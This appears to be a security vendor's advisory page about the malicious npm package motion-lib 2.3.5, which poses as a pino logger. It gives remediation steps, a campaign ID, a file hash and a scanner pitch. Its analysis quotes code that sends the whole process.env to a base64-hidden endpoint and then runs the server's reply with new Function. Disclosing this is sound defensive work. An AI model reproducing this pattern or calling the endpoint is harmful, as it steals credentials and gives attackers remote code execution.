Which versions of motion-lib are malicious?

The following npm versions of motion-lib are flagged malicious: 2.3.5. Treat any of these as compromised.

How do I remediate motion-lib if I installed it?

Remove motion-lib from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is motion-lib part of a known attack campaign?

Yes — motion-lib is associated with the IN-MAL-2026-006827 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect motion-lib in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking motion-lib and packages like it before any post-install script runs.

Malicious package

motion-libnpm

Malicious code in motion-lib (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5925

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall motion-lib

What this malware does

[email protected] masquerades as a pino-style logger (exports module.exports.pino, ships proto.js/multistream.js/transport.js/redaction.js/levels.js, advertises 'fast','logger','stream','json' keywords) but its middleware factory in index.js spawns a detached node lib/initializeCaller.js. That script shadows process with a local object whose env.DEV_API_KEY holds a base64-encoded string that decodes to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df, then POSTs the host's full real process.env to that endpoint with header x-secret-header: secret (axios.post(apiEndpoint, {...process.env },...)). The HTTP response body is then executed via new Function('require', response.data); executor(require);, giving the remote endpoint arbitrary code execution with full Node capabilities (filesystem, network, child_process) on the installer's machine. The combination of full-environment exfiltration (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets, DB creds), eval-of-remote-response RCE, base64 obfuscation of the C2 URL, and impersonation of a popular logger package is an unambiguous supply-chain attack.

Malicious versions

1 flagged

2.3.5

Indicators of compromise (SHA-256)

0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176

Frequently asked questions

No. motion-lib on npm has been identified as a malicious package (version 2.3.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006827

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection